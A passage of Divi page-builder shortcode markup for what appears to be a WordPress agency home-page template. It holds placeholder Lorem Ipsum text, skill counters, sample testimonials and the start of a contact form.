title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" 